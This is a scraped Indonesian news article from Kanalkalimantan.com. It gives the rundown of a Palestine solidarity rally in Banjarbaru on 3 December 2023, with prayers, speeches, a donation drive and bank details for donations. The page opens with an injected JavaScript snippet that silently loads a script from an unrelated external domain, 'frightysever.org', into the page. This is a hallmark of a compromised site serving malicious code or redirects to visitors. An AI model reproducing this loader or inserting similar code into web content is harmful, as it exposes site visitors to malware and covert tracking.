(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Dihadiri Duta Besar Palestina, Ini Rundown Aksi Bela Palestina di Lapangan Murdjani Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Ibu Kota Provinsi Kalimantan Selatan (Kalsel) akan menjadi tempat penyelenggaraan Aksi Bela Palestina, pada Minggu (3/12/2023) subuh hingga siang.

Kegiatan rencananya diselenggarakan terpusat di lapangan dr Murdjani Kota Banjarbaru, dimulai pukul 04.00 Wita.

Aksi Bela Palestina ini dirangkai beragam kegiatan, mulai dari Subuh Akbar dan Doa Bersama untuk Palestina hingga Pawai Akbar dan Jalan Sehat untuk Palestina.

Seperti terpantau melalui akun media sosial resmi @aksibelapalestinakalsel, penyelenggara acara membagikan rundown atau susunan acara.

Baca juga: Linda Ditemukan Tersangkut di Pampangan Ilung

Dalam postingan itu ditulis, kegiatan akan dimulai pukul 04.00 Wita, dengan melaksanakan salat subuh berjamaah di lapangan yang akan dipimpin oleh Imam KH Hasanudin Badruddin, Pimpinan Pondok Pesantren Darussalam Martapura.

“Terbuka untuk semua jemaah dan santri pondok pesantren se Kalimantan Selatan,” tulis postingan akun instagram @aksibelapalestinakalsel, Jumat (1/12/2023).

Kegiatan dilanjutkan dengan pembacaan lantunan Hadrah, Maulid, Shalawat Habib Abdillah Yahya Al Habsy, kemudian dirangkai dengan persiapan jalan sehat dan pawai akbar.

Sekitar pukul 07.45 Wita, direncanakan para peserta akan menyaksikan penyampaian orasi aksi bela palestina oleh Ustadz Bactiar Nasir Lc MM.

Baca juga: Warga Desa Haur Kuning Gotong Royong Bersihkan Gulma di Sungai

Kemudian sambutan dari Wali Kota Banjarbaru HM Aditya Mufti Arifin dan sambutan dari Duta Besar Palestina untuk Indonesia Dr Zuhair S M.

Kegiatan juga akan dirangkai dengan aksi penggalangan donasi oleh Majelis Ta’lim Darul Hasyimi hingga para pengusaha Banua.

Rangkaian kegitan pun ditutup dengan doa bersama oleh Habib Said Abdullah Alkaf serta pembagian doorprize yang kepada para peserta.

Sementara itu dalam postingan, donasi yang telah diperoleh hasil sumbangan masyarakat Banua Kalsel hingga Kamis 1 Desember 2023 adalah sebesar Rp155 juta.

Baca juga: Warga Desa Haur Kuning Gotong Royong Bersihkan Gulma di Sungai

Masyarakat yang ingin berdonasi atau berinfaq bisa melalui rekening BRI 4535-01-037076-53-8 an Aksi Bela Palestina, dan mengirimkan bukti pembayaran melalui nomor 08115540303 (Rona). (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Sempat Sengat Pelajar Madrasah, Sarang Tawon Dalam Kelas Dievakuasi Damkar HSU

KANALKALIMANTAN.COM, AMUNTAI - Khawatir membahayakan para pelajar, sarang tawon berukuran sedang berhasil dievakuasi petugas Pemadam… Read More

1 jam ago

Peningkatan Kapasitas Anggota BPD, Ini Kata Pj Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan menilai penting peranan… Read More

2 jam ago

Dua Raperda Disahkan, Ketua DPRD: Payung Hukum yang Jelas Bagi Cagar Budaya di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dua buah Rancangan Peraturan Daerah (Raperda) Kota Banjarbaru disahkan dalam rapat paripurna… Read More

4 jam ago

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

6 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

8 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

9 jam ago

This website uses cookies.